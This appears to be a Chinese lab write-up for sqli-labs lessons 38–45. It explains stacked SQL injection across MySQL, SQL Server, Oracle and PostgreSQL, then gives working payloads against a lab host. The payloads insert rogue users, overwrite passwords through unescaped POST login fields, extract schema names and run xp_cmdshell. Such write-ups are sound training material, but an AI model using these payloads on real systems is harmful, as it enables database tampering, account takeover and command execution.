Less-38
堆叠注入
原理简介
堆叠注入简介
Stacked injections: 堆叠注入。从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stackedinjection。
原理
在SQL 中, 分号(;)是用来表示一条sql 语句的结束。试想一下我们在; 结束一个 sql语句后继续构造下一条语句, 会不会一起执行?因此这个想法也就造就了堆叠注入。而 unionin jection(联合注入)也是将两条语句合并在一起, 两者之间有什么区别么?区别就在于 union或者 union all 执行的语句类型是有限的, 可以用来执行查询语句, 而堆叠注入可以执行的是任意的语句。
局限性
堆叠注入的局限性在于并不是每一个环境下都可以执行, 可能受到 API 或者数据库引擎不支持的限制, 当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。
虽然我们前面提到了堆叠查询可以执行任意的sql 语句, 但是这种注入方式并不是十分的完美的。在我们的web 系统中, 因为代码通常只返回一个查询结果, 因此, 堆叠注入第二个语句产生错误或者结果只能被忽略, 我们在前端界面是无法看到返回结果的。
因此, 在读取数据时, 我们建议使用union(联合)注入。同时在使用堆叠注入之前, 我们也是需要知道一些数据库相关信息的, 例如表名, 列名等信息。
各个数据库实例介绍
本节我们从常用数据库角度出发, 介绍几个类型的数据库的相关用法。数据库的基本操作, 增删查改。以下列出数据库相关堆叠注入的基本操作。
Mysql 数据库
新建一个表
select * from users where id=1;create table test like users;
show tables;
删除上面新建的 test 表
select * from users where id=1;drop table test;
show tables;
查询数据
select * from users where id=1;select 1,2,3;
加载文件
select * from users where id=1;select load_file(‘c:/tmpupbbn.php’);
修改数
select * from users where id=1;insert into users(id,username,password) values(‘100’,’new’,’new’);
select * from users;
sql server
增加数据表
select * from test;create table sc3(ss CHAR(8));
删除数据表
select * from test;drop table sc3;
查询数据
select 1,2,3;select * from test;
修改数据
select * from test;update test set name=’test’ where id=3;
sqlserver 中最为重要的存储过程的执行
select * from test where id=1;exec master..xp_cmdshell ‘ipconfig’
Oracle 数据库
上面的介绍中我们已经提及, oracle 不能使用堆叠注入, 可以从图中看到, 当有两条语句在同一行时, 直接报错。无效字符。后面的就不往下继续尝试了。
Postgresql 数据库
新建一个表
select * from user_test;create table user_data(id DATE);
select * from user_data;
删除上面新建的user_data 表
select * from user_test;delete from user_data;
查询数据
select * from user_test;select 1,2,3;
修改数据
select * from user_test;update user_test set name=’modify’ where name=’张三’;
select * from user_data;
这里可以使用报错注入,和堆叠注入
http://10.10.202.112/sqli/Less-38?id=-1' union select 1,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),3--+
堆叠注入
http://10.10.202.112/sqli/Less-38?id=1' #报错
http://10.10.202.112/sqli/Less-38?id=1';insert into users(id,username,password) values (100,'hack404','hack404')--+
Less-39
堆叠注入 - 整型 - GET
SELECT * FROM users WHERE id=$id LIMIT 0,1
http://10.10.202.112/sqli/Less-39?id=100;insert into users(id,username,password) values(101,'hack405','hack405')--+
Less-40
盲注 - 堆叠注入 - 字符型 - GET
可以使用报错型注入:
http://10.10.202.112/sqli/Less-40?id=-1' ) union select 1,2,3--+
http://10.10.202.112/sqli/Less-40?id=1' ); insert into users(id,username,password) values(106,'hack406','hack406')--+
Less-41 盲注 - 堆叠注入 - 整型 - GET
整形注入:
http://10.10.202.112/sqli/Less-41?id=11 and 1=2--+ #false
http://10.10.202.112/sqli/Less-41?id=11 and 1=1--+ #true
http://10.10.202.112/sqli/Less-41?id=11; insert into users(id,username,password) values(107,'hack407','hack407')--+
Less-42 报错型堆叠注入 - 字符型 - POST
Password 变量在post 过程中,没有通过 mysql_real_escape_string() 函数的处理。因此在登录的时候密码选项我们可以进行利用
这里我们通过password字段通过堆叠注入更改id=107的用户密码
payload:
login_user=admin&login_password=1’;update users set password='123456' where id=107-- -&mysubmit=Login
Less-43 报错型 - 堆叠注入 - 字符型 - POST
payload:
login_user=admin&login_password=123');update users set password='123456' where id=106-- -&mysubmit=Login
Less-44 盲注 - 堆叠注入 - 字符型 - POST
payload:
login_user=admin&login_password=123';insert into users(id,username,password) values(108,'hack408','hack408')-- -&mysubmit=Login
Less-45 报错型堆叠注入 - 字符型 - POST
payload:
login_user=admin&login_password=123');insert into users(id,username,password) values(109,'hack409','hack409')-- -&mysubmit=Login
待续!!!